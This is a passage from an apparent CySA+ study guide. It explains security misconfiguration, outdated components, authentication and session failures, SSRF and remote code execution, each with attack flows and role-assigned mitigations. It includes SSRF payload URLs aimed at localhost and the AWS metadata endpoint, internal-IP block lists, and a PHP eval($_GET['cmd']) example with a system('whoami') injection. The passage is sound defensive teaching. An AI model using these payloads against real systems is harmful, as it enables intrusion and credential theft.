○ Fix: Rethink and redesign functionality with abuse cases in mind
● Insecure Implementation
○ What it is: A coding-level flaw that makes the system behave incorrectly
○ When it happens: During development
○ Example: Developer intends to check authorization but uses the wrong logic or forgets a check
entirely
○ Fix: Patch the code; secure design may be present but executed poorly
● Misconfiguration
○ What it is: A flaw in system setup or deployment
○ When it happens: During configuration or operations
○ Example: Leaving a debug mode enabled in production or exposing a sensitive port to the public.
(Leaving debug mode enabled in production exposes detailed internal system behavior that can be
used by attackers to map the system, exploit vulnerabilities, or even gain remote code execution —
making it a critical misconfiguration.)
○ Fix: Adjust settings or harden the deployment environment

Insecure design reflects what the system allows by design, insecure implementation reflects how that
design is written in code, and misconfiguration reflects how the system is deployed and maintained.
HTTP Status Code Categories – Quick Reference
● 1xx – Informational
○ Purpose: Request received, continuing process
○ Example: 100 Continue — the server acknowledges that headers are received and client can send
the body
● 2xx – Success
○ Purpose: The request was successfully received, understood, and accepted
○ Example: 200 OK — standard success response
○ Example: 201 Created — resource was successfully created (e.g., after a POST)
● 3xx – Redirection
○ Purpose: Further action is needed to complete the request
○ Example: 301 Moved Permanently — the resource has a new URL

151

○ Example: 302 Found — temporarily redirected
● 4xx – Client Errors
○ Purpose: The client made a bad request
○ Example: 400 Bad Request — malformed syntax or invalid input
○ Example: 401 Unauthorized — authentication required (but not provided or failed)
○ Example: 403 Forbidden — request is understood but explicitly denied
○ Example: 404 Not Found — requested resource does not exist
● 5xx – Server Errors
○ Purpose: The server failed to fulfill a valid request
○ Example: 500 Internal Server Error — generic error on the server
○ Example: 502 Bad Gateway — invalid response from upstream server
○ Example: 503 Service Unavailable — server is temporarily overloaded or under maintenance

Summary HTTP status codes provide insight into whether a web request was successful, redirected,
rejected, or failed due to server error — but security analysts must look beyond status codes like 200 OK, as
attackers can manipulate requests that appear successful at the protocol level.

Security Misconfiguration
(CySA+ Domain 2.4 — Given a scenario, recommend controls to mitigate attacks and software vulnerabilities)
1. Normal System Behavior (Before Exploitation)
A properly configured system is hardened for its environment. This includes:
● Only necessary services are enabled
● Default passwords and settings are removed

152

● File permissions are restricted
● Error messages reveal no internal logic
● Servers, frameworks, APIs, and platforms are configured deliberately and securely
Definitions: Servers, Frameworks, APIs, and Platforms
● Servers
A server is a computer or virtual machine that hosts and delivers services (like web pages, databases, or
applications) to users or other systems over a network.
○ Why it matters: Servers must be hardened — this includes closing unused ports, disabling
unnecessary services, and applying updates to prevent attackers from exploiting open entry points.

● Frameworks
A framework is a set of pre-built code libraries and tools that help developers build applications faster.
Examples include Django (Python), Laravel (PHP), or Spring (Java).
○ Why it matters: Frameworks often come with default settings, admin panels, debug modes, or test
accounts that must be disabled or changed before deployment.

● APIs (Application Programming Interfaces)
An API is a structured way for software systems to talk to each other — often by sending and receiving data
over the web (e.g., REST APIs or JSON-based services).
What Is a REST API?
REST API stands for Representational State Transfer Application Programming Interface.
It is a widely used web-based communication method that allows two systems (like a browser and a server, or two
applications) to exchange data using standard HTTP methods like:
● GET (retrieve data)
● POST (submit data)
● PUT (update data)
DELETE (remove data)

REST APIs are designed to be simple, stateless, and lightweight — they often expose specific URLs (called
endpoints) for each resource. A stateless REST API does not retain information between requests — each
interaction must be complete and self-contained, which simplifies the server design and reduces the risk of session-
related vulnerabilities.
Example:
● GET https://api.example.com/users/123
This might retrieve user data for user ID 123.

What Is a JSON-Based Service?

153
JSON-based services are APIs or web services that send and receive data in JSON (JavaScript
Object Notation) format.
JSON is a lightweight, human-readable data format used to represent structured information. It’s commonly used in
REST APIs to transmit data. JSON is called “lightweight” because it uses minimal formatting and small file sizes,
making it fast to transmit, easy to read, and efficient to process.
Example JSON Response:
json
● {
● &quot;id&quot;: 123,
● &quot;name&quot;: &quot;Alice&quot;,
● &quot;email&quot;: &quot;alice@example.com&quot;
● }
Most REST APIs today are JSON-based, which means the data they handle (requests and responses) is formatted
using JSON.

Clear Relationship Between the Two
● REST = the communication method / design style
● JSON = the data format used inside that communication

Think of REST as the delivery service, and JSON as the package being delivered.

Summary REST APIs are standardized interfaces that allow applications to communicate using HTTP,
while JSON is the structured format commonly used to encode and exchange the data within those APIs.

○ Why it matters: APIs must be configured to authenticate users, validate input, and restrict
access to only what’s needed. Misconfigured APIs may expose sensitive data or allow
unauthorized access.

● Platforms
A platform refers to a broader software environment or ecosystem — this could be a cloud platform (like
AWS or Azure), a container orchestration platform (like Kubernetes), or a content management system
(like WordPress).
○ Why it matters: Platforms include many moving parts, and a misconfigured setting (e.g., public
storage, open admin panels, weak default permissions) can introduce system-wide exposure.
In short: functionality is controlled and intentional. The system does what it&#39;s supposed to — and only that.

154

2. Where the Vulnerability Exists
Security misconfiguration occurs when systems are deployed or maintained with:
● Unnecessary services, ports, or components still active
● Default settings or credentials left unchanged
● Excessive permissions on files or directories
● Detailed error messages shown to users
● Security features disabled (e.g., input validation, authentication)
● Outdated components or missing patches
These aren’t programming errors — they’re failures to lock down the system after it&#39;s built.
Misconfiguration can affect:
● Web servers
● Databases
Application frameworks
● Cloud storage (e.g., exposed AWS S3 buckets)
Containers (e.g., Docker images with root access)
3. Attacker Flow — Step-by-Step Example
Scenario: Default Admin Portal Left Open
1. Developer installs a web application framework (e.g., WordPress, Tomcat, Jenkins).
Admin interface is enabled by default, available at a known URL (e.g., /admin, /manager/html).
2. Default credentials are never changed.
3. No firewall or access control blocks access from the public internet.
Attacker performs automated scan, finds the open admin page.
4. Logs in with default credentials or brute-forces weak ones.
5. Full control of the application is achieved.
The vulnerability is not in the app — it’s in the way it was deployed.

4. System Consequences
Security misconfiguration is often:
● Silent — systems may run fine for months while exposed
Universal — any layer of the stack (app, OS, cloud, network) can be affected
Easily exploited — attackers often scan for known misconfigurations using automated tools
Consequences include:
● Unauthorized access
● Data exposure
● Server takeover
● Lateral movement into internal systems

155
When we say a vulnerability can occur at any layer of the stack, we’re referring to the technology stack —
meaning all the layers of software and infrastructure that support an application or system.
This is not the same as the OSI model (which is about network communication).
The Technology Stack Includes:
● Application layer (e.g., web app, APIs, business logic)
● Frameworks and libraries (e.g., Django, Node.js, Spring)
Runtime environment (e.g., Python interpreter, Java Virtual Machine)
● Operating system (e.g., Linux, Windows)
● Virtualization/container layer (e.g., Docker, Kubernetes)
● Infrastructure / network (e.g., firewalls, load balancers, DNS)
● Cloud services (e.g., AWS S3, Azure VMs, GCP IAM
A misconfiguration in any one of these layers can lead to a serious security flaw.
Now, About the OSI Model
Yes — the OSI model (layers 1 through 7) is also a “stack,” but it’s specific to network communication, not
general software deployment.
The OSI stack = network communication layers (physical, data link, network, etc.)
The technology stack = software and infrastructure layers that make a system run.
They are both valid uses of the word “stack,” but in different contexts.
Summary Sentence for the Book:
In cybersecurity, “stack” can refer to either the network communication layers (OSI model) or the full
technology stack that supports an application. In the context of security misconfiguration, “stack”
means the layers of software, frameworks, operating systems, and infrastructure that must all be
securely configured.

5. Mitigation Strategies (Role-Assigned)
1. [System Administrator] Harden Servers and Services
● Disable unused ports and services
Remove sample files, test pages, and admin panels not needed in production
● 2. [Developer / DevOps] Change Default Settings
● Replace all default credentials
● Lock down administrative interfaces
● Set proper file and directory permissions
● 3. [Security Analyst / QA] Perform Regular Configuration Audits

156

● Run vulnerability scans for exposed ports, directories, and services
● Check for version disclosures and verbose error messages
● Validate access controls at all endpoints

4. [Cloud / Infrastructure Engineer] Implement Secure Defaults
● Use hardened images and templates
● Enforce encryption at rest and in transit
● Audit storage permissions (e.g., public S3 buckets)

5. [Security Leadership] Adopt Secure Configuration Baselines
● Follow CIS Benchmarks and industry frameworks
● Apply configuration-as-code and version-controlled infrastructure
● Train teams to treat configuration as a security responsibility
● Security misconfigurations are often low-effort, high-impact weaknesses caused by overlooking defaults,
failing to lock down access, or skipping hardening steps. These flaws don’t require code changes to fix —
they require operational discipline and secure-by-default thinking. They are especially dangerous
because attackers can find them easily and exploit them without specialized knowledge. Preventing
misconfiguration requires secure deployment practices, automated validation, and consistent oversight.

End-of-Life (EOL) or Outdated Components
(CySA+ Domain 2.4 — Given a scenario, recommend controls to mitigate attacks and software vulnerabilities)
1. Normal System Behavior (Before Exploitation)
In a well-maintained environment:
● All software components (apps, libraries, frameworks, plugins, operating systems) are actively supported
by their vendors or open-source communities. Frameworks include libraries, but they also impose structure
and control — making them broader than a library and more influential in application design.
● Security patches are released and applied regularly
● Known vulnerabilities are monitored and mitigated
● The system is updated to remain compatible with evolving standards (e.g., TLS versions, encryption
algorithms).
● This ensures that software can resist newly discovered threats and integrate securely into the broader
ecosystem.
2. Where the Vulnerability Exists
End-of-life (EOL) software refers to components that are no longer supported by the vendor — meaning:
● No security patches are released, even if new vulnerabilities are found\
● Known exploits may remain unpatched indefinitely

157

● Attackers can freely target these systems, knowing defenses will not improve
Outdated components, even if not fully EOL, pose similar risks:
● May be missing critical updates
● Use old protocols (e.g., TLS 1.0, SMBv1) SMBv1 is an outdated file-sharing protocol that lacks critical
security controls and has been the target of major exploits, making it a prime example of an outdated
component that should be retired.
● Contain known vulnerabilities with public proof-of-concept exploits
These risks apply across the stack: operating systems, CMS platforms, web frameworks, plugins, firmware, even
device drivers.

3. Attacker Flow — Step-by-Step Example
Scenario: Web Application Running an Outdated Plugin
1. An organization uses a content management system (e.g., WordPress) with several third-party plugins.
2. One plugin hasn’t been updated in 2 years. It’s no longer maintained by the developer.
A critical vulnerability was disclosed last year. Proof-of-concept exploit code is available online.
3. The organization never removed or replaced the plugin. No patch is available.
4. An attacker scans the internet for sites using this plugin version, finds the organization’s site.
They exploit the vulnerability, gaining remote code execution on the web server.
There is no zero-day here. The attack succeeds because the organization failed to retire or replace a known-
vulnerable component.
4. System Consequences
● Persistent known vulnerabilities that cannot be patched
● Easy enumeration and exploitation using public tools (e.g., Shodan, Nuclei, Metasploit)
● Compliance failure with industry standards (PCI DSS, HIPAA, NIST)
● High lateral movement risk — attackers use outdated entry points to breach deeper systems
EOL systems often also lack support for modern cryptography, secure protocols, and monitoring capabilities —
compounding their risk.
5. Mitigation Strategies (Role-Assigned)
1. [IT Operations / System Administrators] Maintain Asset Inventory
● Track all software versions, libraries, and dependencies
Identify components nearing end-of-life and flag them for action
2. [Security Analysts / Vulnerability Managers] Monitor CVEs and Vendor Alerts
● Subscribe to security advisories for OS, frameworks, and third-party tools
● Cross-check internal systems against vulnerability databases (e.g., NVD, CISA KEV)

158

3. [DevOps / Developers] Practice Dependency Management
● Use tools like pip-audit, npm audit, or OWASP Dependency-Check
● Replace unsupported libraries with maintained alternatives
● Avoid using deprecated APIs or legacy protocols

4. [Leadership / Procurement] Set Policy for Technology Lifecycle
● Ban or phase out EOL software
● Require vendors to disclose support timelines
● Allocate budget for refactoring and upgrades

6. Reinforcement Summary
Using end-of-life or outdated software introduces known, preventable risk. These components are often well-
documented targets with no future security updates, making them ideal entry points for attackers. The fix is not
technical — it’s operational: maintain asset visibility, monitor lifecycle timelines, and enforce upgrade discipline. In
cybersecurity, invisibility and neglect are more dangerous than complexity.

Identification and Authentication Failures
(CySA+ Domain 2.4 — Given a scenario, recommend controls to mitigate attacks and software vulnerabilities)
1. Normal System Behavior (Before Exploitation)
In a secure system:
● Identification answers who are you? (e.g., username, email, ID number)
● Authentication verifies are you really that person? (e.g., password, biometric, token)
● Systems should:
○ Verify credentials securely (e.g., hashed passwords)
○ Protect login endpoints
○ Throttle failed login attempts
○ Enforce strong password policies
○ Use multi-factor authentication (MFA) where appropriate
The goal is simple: Only legitimate users gain access, and only at the right level.

2. Where the Vulnerability Exists

159

Identification and authentication failures occur when:
● The system allows attackers to:
○ Bypass login entirely (e.g., logic flaw, weak token validation)
○ Brute-force or guess credentials without restriction
○ Exploit insecure password storage
○ Use leaked credentials without MFA protection
● Or when:
Login logic leaks clues (e.g., “invalid password” vs. “user not found”)
Session tokens are not rotated, expire too slowly, or can be predicted

Common Areas Where Identification and Authentication Failures Occur
1. Login Forms
Insecure login forms may allow brute-force attacks, fail to enforce password complexity, leak user
enumeration clues through different error messages, or transmit credentials over unencrypted connections.
Poorly implemented login logic can result in account takeover or unauthorized access.
2. Session Management Systems
If session IDs are predictable, never expire, or are not properly invalidated on logout, attackers can hijack
sessions and impersonate users. Failure to regenerate session tokens after authentication (or privilege
escalation) leaves the system vulnerable to session fixation attacks.
3. If session tokens are not regenerated after login or privilege escalation, the system may be vulnerable to
session fixation — a type of attack where the attacker sets or knows a session ID before the victim logs in,
then hijacks the session afterward. Insecure systems allow users to authenticate into a session that was
created or guessed earlier, without issuing a fresh, secure token. This makes it possible for attackers to
inherit valid sessions — and, if permissions are escalated, potentially inherit admin-level access as well.
Session Management: Mitigation Checklist (With Definitions)
1. Regenerate Session ID After Login
● What it means: Once a user successfully authenticates, the server should discard the old session ID (from
before login) and issue a new, unique session ID.
Session IDs are often issued before login to track anonymous users and preserve application state. If the
session ID is not regenerated after authentication, it may allow attackers to hijack the session — a flaw
known as session fixation.
● Why it matters: This prevents session fixation. If the ID before login is reused after login, an attacker could
hijack the session they originally set up.
● In session fixation attacks, the attacker doesn’t need to steal a session token — they need to control it
ahead of time. They do this by supplying a session ID (e.g., via a crafted URL) that the victim unknowingly
uses. If the system allows the token to persist through authentication, the attacker can hijack the session
once the victim logs in.

2. Regenerate Session ID After Privilege Escalation
● What it means: If a user gains additional access (e.g., becomes an admin or enters secure areas), a new
session token should be issued.

160
● Why it matters: This severs any old or compromised tokens that might have been issued when the user
had lower privileges.
3. Set Session Expiration Timers
● What it means: Sessions should automatically expire after a set period of inactivity (e.g., 15–30 minutes).
● Why it matters: This limits the window of opportunity for an attacker to use a stolen or hijacked session
token.
4. Set HttpOnly Flag on Session Cookies
● What it means: This flag prevents JavaScript running in the browser from accessing the session cookie.
● Why it matters: It helps defend against cross-site scripting (XSS) attacks, which might try to steal session
cookies via injected scripts.
5. Set Secure Flag on Session Cookies
● What it means: This flag tells the browser to only send the cookie over HTTPS — never over plain HTTP.
● Why it matters: It protects session cookies from being intercepted by attackers via network sniffing or
man-in-the-middle attacks on unsecured connections.
6. Set SameSite Attribute on Cookies
● What it means: This limits whether cookies are sent with requests initiated from other sites.
● Why it matters: It helps prevent cross-site request forgery (CSRF) attacks by ensuring that session
cookies aren&#39;t automatically sent when requests originate from untrusted or external domains.
● Example values:
○ SameSite=Strict — Only send cookies from the same site.
○ SameSite=Lax — Send cookies on top-level navigation from other sites (e.g., clicking a link).
○ SameSite=None; Secure — Send cookies with all requests, but only if Secure is also set.

7. Tie Session to User Attributes (Optional Advanced Control)
● What it means: Associate the session token with additional identifying info such as:
○ User-agent string (browser type/version)
○ IP address range
● Why it matters: Prevents token replay attacks by making it harder for a stolen session token to be reused
in a different browser or from a different location.
8. Use Strong Session Token Entropy
● What it means: Tokens should be long, randomly generated, and unpredictable.
● Why it matters: Prevents attackers from guessing or brute-forcing session tokens. Cryptographically
secure random generators should be used.
Summary
Proper session management requires not only issuing secure tokens, but also controlling when they
are created, how they expire, and what conditions must be met for them to remain valid. Every step is
a safeguard against fixation, hijacking, or unauthorized reuse.
4. Forgotten Password Workflows

161
Weak or unverified password reset flows may allow attackers to reset a user’s password using guessed
security questions, unvalidated email addresses, or intercepted reset tokens. These paths are frequently
overlooked and often lack the same protections as login pages.
5. API Key Validation
Applications that expose APIs often use keys or tokens for access. If these keys are hardcoded, reused,
shared insecurely (e.g., in client-side code (Client-side code is executed in the user’s browser and can be
viewed by anyone. API keys should never be placed in client-side code, as attackers can extract them and
gain unauthorized access to protected systems., or not scoped properly, attackers may gain unauthorized
access to backend systems or data — often with elevated privileges.)
6. OAuth and Single Sign-On (SSO) Integrations
Improper implementation of federated identity systems (like OAuth or SAML) can allow token forgery,
misuse of redirect URIs, or trust in unvalidated identity assertions. Mistakes in validating tokens or
parsing third-party responses can allow attackers to impersonate users without needing credentials.
OAuth and SSO systems use redirect URIs to return users and tokens after login. If redirect URIs aren’t validated,
tokens can be sent to attacker-controlled sites. Likewise, identity assertions — the claims made by identity providers
— must always be cryptographically verified. Trusting unvalidated assertions opens the door to token forgery,
impersonation, and unauthorized access.
1. What Is a URI?
A URI (Uniform Resource Identifier) is a string that identifies a resource, usually a location on the
web — often in the form of a URL, but broader.
Examples:
● https://login.example.com/callback (a URL — a type of URI)
● mailto:help@example.com (another form of URI)
urn:isbn:0451450523 (not a web address, but still a URI)
●

3. Attacker Flow — Step-by-Step Example
Scenario: Brute-Force Attack on a Weak Login Endpoint
1. The application allows unlimited login attempts from the same IP address.
2. The attacker runs a script that cycles through a common list of usernames and passwords (e.g., admin,
password123).
3. The login form returns different error messages for wrong usernames vs. wrong passwords.
The attacker identifies valid usernames, then focuses on brute-forcing their passwords.
4. Eventually, they log in successfully to one or more accounts — possibly privileged ones.
Result: The system’s failure to limit login attempts or mask authentication feedback enables unauthorized access.
4. System Consequences

162

● Account takeover and data exposure
● Privilege escalation through lateral movement
Use of stolen sessions (if session tokens aren’t secured)
Reputation damage if attackers access customer-facing systems
● Credential stuffing at scale, especially when usernames are predictable or passwords reused

5. Mitigation Strategies (Role-Assigned)
1. [Developers / Security Architects] Use Strong Authentication Mechanisms
● Store passwords using strong hashing algorithms (e.g., bcrypt, scrypt, Argon2)
● Implement MFA for all administrative and sensitive accounts
● Validate session tokens securely and expire them properly

2. [Application Developers] Prevent Brute-Force Attacks
● Use rate limiting or lockouts after failed login attempts
● Monitor for credential stuffing patterns (e.g., login spikes)
● Return generic error messages (e.g., “Invalid credentials”)

3. [Security Analysts / SOC Team] Monitor and Alert on Login Anomalies
● Track failed login spikes
● Correlate IP-based activity to detect automation
● Trigger alerts on known password spraying behavior. Password spraying is a stealthy brute-force technique
where attackers try a few common passwords across many accounts, bypassing lockout defenses and
targeting predictable human behavior.
4. [System Admin / IAM Team] Enforce Credential and Session Hygiene
● Require strong, rotating passwords
Audit and revoke unused credentials
Rotate API keys and service accounts regularly
6. Reinforcement Summary
Identification and authentication failures expose the very gates of the system. These are not exotic attacks — they
exploit weak passwords, poor validation, and lazy session handling. The solution is a combination of strong
cryptography, access discipline, and behavior-aware monitoring. Authentication is not just about letting people in
— it’s about knowing who they are, when, and with what level of confidence.
Common Authentication Errors (with Detection Methods)
● Weak password policies
Detection: Review IAM or Active Directory password policy configuration; audit password hash dumps (if
obtained in testing) for guessable passwords.
● Lack of multi-factor authentication (MFA)

163
Detection: Check login logs for absence of MFA challenge steps; verify configuration in identity provider
dashboards.
● No rate limiting or lockout on failed login attempts
Detection: Look for high volume of failed login attempts per user or per IP in a short time (e.g., via SIEM
rules).
● Insecure storage of passwords
Detection: Examine application or configuration files for plaintext credentials; confirm password hashing
algorithms used via code or system audit.
● Session ID not regenerated after login
Detection: Capture and compare session token before and after login using tools like Burp Suite or browser
DevTools.
● Predictable or poorly randomized session tokens
Detection: Use fuzzing or entropy analysis tools to assess token randomness; analyze logs for reused or
short tokens.
● Exposing sensitive tokens in URLs or client-side code
Detection: Review front-end JavaScript, browser DevTools, or URL query parameters for token leakage.
● No session timeout or expiration
Detection: Test session duration through idle inactivity; analyze cookie headers for expiration settings.
● Error messages that reveal user information
Detection: Try valid and invalid usernames on login form; compare system response or error messages in
logs or front-end UI.
● Failure to validate third-party identity assertions (OAuth/SAML)
Detection: Examine authentication code for lack of token signature verification or issuer validation; check
logs for token acceptance from untrusted sources.
● Reusing API keys across services or environments
Detection: Audit key usage in API gateway logs; inspect access logs for keys used from unexpected IPs or
systems.
● Not tying session tokens to user/device context
Detection: Analyze session activity logs for token reuse across changing IPs, geolocations, or browser
fingerprints.
● Allowing login over insecure channels (HTTP)
Detection: Use packet capture tools like Wireshark or ZAP to verify if credentials or tokens are transmitted
over plaintext HTTP.

Server-Side Request Forgery (SSRF)
(From the section: “Given a scenario, recommend controls to mitigate attacks and software vulnerabilities”)
Definition

164
Server-side request forgery (SSRF) is a vulnerability where an attacker tricks a vulnerable server
into making unauthorized requests to internal or external systems, on behalf of the server itself.
The key distinction is that the attacker isn’t directly accessing a resource — instead, they’re getting the server to
do it for them.
Normal System Behavior Before Exploitation
Web applications sometimes legitimately make outgoing requests from the server — for example:
● Fetching data from an API
Pulling a user’s profile image from a URL
● Importing documents from an external source
In these cases, the server:
● Accepts a URL or address as input (from the user)
Sends the request from the server, not the user’s browser
● Returns the result to the user
●
Example: Profile Picture Import from a Social Media Link
Scenario:
A web application allows users to import their profile picture by pasting a link to an image hosted elsewhere — for
example, from Facebook or LinkedIn.
Normal Workflow:
● User pastes this URL into the form:
https://profile-images.linkedin.com/user12345.jpg

The server receives this URL and:
○ Makes an outbound HTTP request to download the image
○ Verifies it’s a valid image file (e.g., JPEG)
Stores or resizes the image for display in the user’s profile
The image is then shown within the user’s account, hosted locally.
Why It’s Server-Side:
● The image isn&#39;t just displayed via a &lt;img src=&quot;&quot;&gt; tag.
● The server actively retrieves the image and processes it — usually for security, resizing, or long-term
storage.
Why It’s Relevant to SSRF:
If the server does not validate the input URL, an attacker could substitute:

165

● http://127.0.0.1/admin
And the server might unknowingly make an internal request — just like it would for a profile image.
Where the Vulnerability Exists
The vulnerability arises when the server:
● Blindly trusts the user-supplied URL
Doesn’t validate what internal resource it’s being asked to fetch
● Allows access to internal IPs or metadata endpoints not meant to be publicly exposed
Step-by-Step Attack Flow (SSRF Example)
1. Attacker identifies a user-controlled URL field
○ e.g., a feature that lets users “preview a link” or “fetch content from a URL.”
Instead of entering a normal external URL, the attacker enters a sensitive internal one, like:
http://127.0.0.1/admin
or
http://169.254.169.254/latest/meta-data/ (for AWS cloud instances)
2. The vulnerable server sends a request to that internal address, assuming it’s safe.
3. The attacker receives sensitive internal data (e.g., metadata, service tokens) or observes behavior that
helps map the internal network.
Optional escalation: SSRF can be used to pivot into internal services, reach protected ports, or exploit
other internal vulnerabilities.
Real-World Consequences
● Exfiltration of cloud credentials (e.g., AWS metadata services)
● Scanning internal ports or services
● Triggering internal admin functionality or APIs
● Bypassing firewall restrictions via the server’s trusted network access

Mitigation Controls for SSRF
1. Input Validation with Domain Allowlisting
● Performed by: Application developers and security engineers during application coding and design
● Definition: Only allow URLs that point to pre-approved, trusted domains or services. All user-supplied URLs
must be checked against this allowlist before the server processes them.

166
● Purpose: Prevent users from entering internal or malicious destinations (e.g., 127.0.0.1, internal admin
pages).

2. Block Access to Internal IP Ranges
● Performed by: Network security team or infrastructure engineers
● Definition: Use firewall rules, proxy filters, or application logic to block requests to sensitive internal IP
address ranges such as:
○ 127.0.0.1 (localhost)
○ 169.254.169.254 (AWS metadata service)
○ 10.0.0.0/8, 192.168.0.0/16 (private internal networks)
● Purpose: Stops SSRF attempts that target internal systems not meant to be accessed externally.

3. Use Egress Filtering on Application Servers
● Performed by: Network administrators and DevOps teams during server/network configuration
● Definition: Configure outbound (egress) firewall rules to prevent the application server from making
requests to any destination it shouldn&#39;t reach — particularly internal services.
● Purpose: Ensures that even if SSRF is attempted, the request cannot reach sensitive infrastructure.

4. Disable Unnecessary URL Fetch Functionality
● Performed by: Application developers during the feature review and design process
● Definition: Remove features that allow users to submit external URLs unless strictly necessary.
● Purpose: Reduces the server’s exposure to abuse. If no remote URL fetching is needed, this entire SSRF
attack surface can be eliminated.

5. Log and Monitor for Internal or Unexpected
Destinations
● Performed by:
Security analysts and Security Operations Center (SOC) teams
In collaboration with cloud engineers or DevOps teams who configure the logging infrastructure.
Defined Roles in This Mitigation:

167

● Attacker:
An external party (outside the organization’s network) attempting to exploit a vulnerability in a web
application to force the server to send internal or privileged requests on their behalf.
● User:
Any user-facing party supplying input to the web application — this includes both legitimate users and
attackers. In SSRF scenarios, the user is the attacker.
● Web Server or Application Server:
The target system inside the organization’s network that processes user input and has the capability to
send outbound HTTP or network requests.
This server is what gets exploited in SSRF — it becomes the attacker’s unwilling proxy.
● SOC Team / Security Analyst:
The internal defenders responsible for reviewing logs and alerts to detect unusual behavior originating from
the server.
Definition of the Control:
The server must be configured to log all outbound HTTP or network requests it makes — especially those
triggered by user-supplied input such as URLs, IPs, or hostnames.
The logs should capture:
● The destination IP address or domain
● The timestamp
The HTTP method and path
The identity of the user or session that triggered the request (if known)

Security analysts should configure alerting rules to flag when:
● The destination IP is in a private or internal range (127.0.0.1, 169.254.169.254, 10.0.0.0/8, etc.)
The request targets a known cloud metadata service
● The domain is not on an approved or expected list of external destinations

Why This Matters:
● In a normal request, the server fetches external content on behalf of a user — such as a link preview or
image import — and sends it back to the browser.
● In an SSRF attack, the attacker supplies a malicious URL that forces the server to contact an internal
system, often not reachable from outside the network.
Because the request originates from the server, the attacker gets access to resources they would never
reach directly.
Purpose of This Mitigation:
To detect SSRF attacks by flagging situations where the server is making outbound connections to
internal or unexpected addresses — a behavior that usually only occurs during exploitation.

168

Clarified Summary Sentence for the Book:
This control helps detect server-side request forgery by monitoring when the server — not the user’s
browser — attempts to contact internal systems or suspicious domains. In SSRF, the attacker acts as
a user, but manipulates input so that the server unknowingly becomes a proxy, exposing internal
systems to unauthorized access. Logging and alerting on outbound server behavior is essential for
detection.
6. Harden Cloud Metadata Service Access
● Performed by: Cloud administrators and DevOps engineers
● Definition: In environments like AWS, enforce metadata protection using IMDSv2, which requires session-
based requests with proper headers.
Purpose: Prevents attackers from abusing SSRF to query cloud credentials via the metadata service
7. Implement SSRF-Specific Web Application Firewall (WAF) Rules
● Performed by: Security engineers and cloud security teams
Definition: Configure the WAF to detect and block common SSRF patterns in user inputs, such as requests
to 127.0.0.1, localhost, or known metadata IPs.
● Purpose: Adds a perimeter defense layer even if application-level filtering fails.
8. Use SSRF-Safe Libraries
● Performed by: Application developers during software selection
● Definition: Choose HTTP libraries that include built-in protections such as automatic denylisting of local IP
ranges or domain validation routines.
● Purpose: Minimizes coding errors that lead to SSRF exposure.

Summary SSRF protection requires coordination between developers, infrastructure teams, cloud
administrators, and security operations. No single layer can fully prevent SSRF; defense-in-depth —
including URL validation, network controls, and behavior-based detection — is essential.
Analogy (Optional)
SSRF is like tricking a receptionist (the server) into calling someone in the building you’re not allowed
to talk to. Instead of asking directly, you say, “Can you call this number for me and repeat what they
say?” — and they do it, unknowingly breaking internal security rules.
Summary
Server-side request forgery (SSRF) exploits the server’s ability to make HTTP requests, using it as a proxy
to access internal or restricted resources. Attackers use SSRF to extract cloud metadata, map internal
networks, or access services behind firewalls. Mitigations focus on validating user-supplied URLs, restricting
server outbound traffic, and logging access to internal destinations.

169

Remote Code Execution (RCE)
Given a scenario, recommend controls to mitigate attacks and software vulnerabilities

1. Defined Roles
● Attacker:
An external or internal threat actor attempting to execute unauthorized code on a target system, usually by
exploiting a vulnerability.
● Victim System:
A web server, application server, endpoint, or backend service running software vulnerable to unsanitized
input or insecure execution.
● User (Optional):
May be a legitimate user unknowingly triggering the exploit (e.g., through a manipulated input field), or the
attacker themselves submitting direct malicious input.
● Security Analyst / SOC Team:
Responsible for detecting indicators of compromise (IOC), investigating unusual process behavior or
outbound traffic, and escalating or coordinating response.

2. Normal System Behavior
Under normal conditions:
● Web applications accept user input (e.g., form data, uploaded files, parameters in URLs).
● That input is processed or stored, but never passed directly to code execution functions like eval(),
exec(), or operating system shell commands. Code execution functions like eval() and exec() are
programming commands that interpret and execute strings of code at runtime.
● For example, in a vulnerable web app, eval(user_input) would actually run whatever the attacker submitted
— turning text into live code, which can be exploited to run unauthorized commands on the server.
● Servers may run backend scripts, but only based on internal logic, not user input.

3. What is Remote Code Execution? (Definition)
Remote Code Execution (RCE) is a vulnerability where an attacker is able to execute arbitrary commands or code
on a remote system by injecting malicious input that the system mistakenly processes as executable code.
What is a remote system in this context?
A remote system refers to any server, application, or device that the attacker does not directly
control, but can send data or requests to over a network — typically through the internet or an
internal corporate network. This could be a public-facing web server, an API, a database service, or a
backend process that accepts user input.

170

Why can the attacker use the remote system to run code?
The attacker exploits a flaw in how the remote system handles user input — usually by injecting
input that is not treated safely as plain data, but is instead mistakenly executed as code. This occurs
when the application fails to sanitize or isolate untrusted input before passing it to powerful functions
like eval() or to system-level command processors.
Simple Framing Analogy
It&#39;s like sending an email to a company receptionist with a script in it — and instead of reading the
message, the receptionist plugs it directly into the company’s computer system and runs it without
question.
Sidebar: Local vs. Remote Code Execution
Local Code Execution (LCE):
The attacker must have some level of access to the target machine — either physical access or a
logged-in user account. The vulnerability allows them to run unauthorized code on the system
they’re already on.
An attacker gains access to a shared workstation using stolen credentials for a non-admin user. They
run a malicious script that exploits a vulnerability in the local operating system, allowing them to
escalate privileges and access sensitive files or install persistence mechanisms.
Remote Code Execution (RCE):
The attacker can run code on a system they do not control and are not logged into, by exploiting
how that system handles external input over a network.
Example: An attacker sends crafted data to a web server, and the server unintentionally executes it,
allowing the attacker to take control.
Quick Summary:
● Local Code Execution: Requires access to the device
Remote Code Execution: Exploits a network-facing interface without access
4. Step-by-Step Attack Flow
Example: PHP Web Application RCE
What does “PHP web application RCE” mean?
This phrase refers to a real-world example of a remote code execution vulnerability affecting a web
application built using PHP — a widely used programming language for websites and online forms.
Breaking it Down:
● PHP:
A popular server-side scripting language used to build dynamic websites. WordPress, for example, is built
in PHP.
● Web Application:

171
A website that does more than just show static content — it processes user input (e.g., login forms,
comment boxes, file uploads).
● RCE (Remote Code Execution):
The vulnerability being exploited — where the attacker gets the server to execute malicious code sent
through user input.
● Why This Matters:
PHP applications are especially vulnerable when developers accidentally allow user-submitted text to
be run as code, instead of treating it as data. This makes PHP-based websites common targets for
RCE attacks.
Vulnerable Input Field:
A web form or API accepts input and passes it directly to a PHP eval() function without proper input
sanitization.

Attacker Input:
The attacker submits:
system(&#39;whoami&#39;);
This gets passed into code like:
eval($_GET[&#39;cmd&#39;]); // vulnerable use

Execution:
The server runs the command — now the attacker knows which user the process is running under.
Escalation:
The attacker sends additional commands (e.g., download reverse shell, access internal files, exfiltrate
secrets).
Persistence or Pivoting:
If successful, the attacker may upload web shells, create new users, or pivot deeper into the internal
